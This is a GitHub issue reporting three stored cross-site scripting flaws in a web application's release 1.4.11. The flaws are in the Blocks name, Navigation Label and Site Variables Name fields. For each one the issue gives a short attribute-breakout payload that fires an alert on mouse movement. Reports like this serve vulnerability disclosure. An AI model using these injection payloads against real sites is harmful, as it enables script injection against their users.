Skip to content

Stored XSS in Blocks/Navigation/Site Variables (release/1.4.11) #574

Closed
@0verall

Description

@0verall
  1. Stored xss in Blocks name
    image
    Refresh the page, it will trigger below "Recently Viewed" menu
    image
    Front page:
    image
    payload:
    "onmousemove="alert(1)

  2. Stored xss in Navigation Label
    image
    image
    payload:
    "onmousemove="alert(/Nav/)

  3. Stored xss in Site Variables Name
    image
    image
    payload:
    "onmousemove="alert(/site/)

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions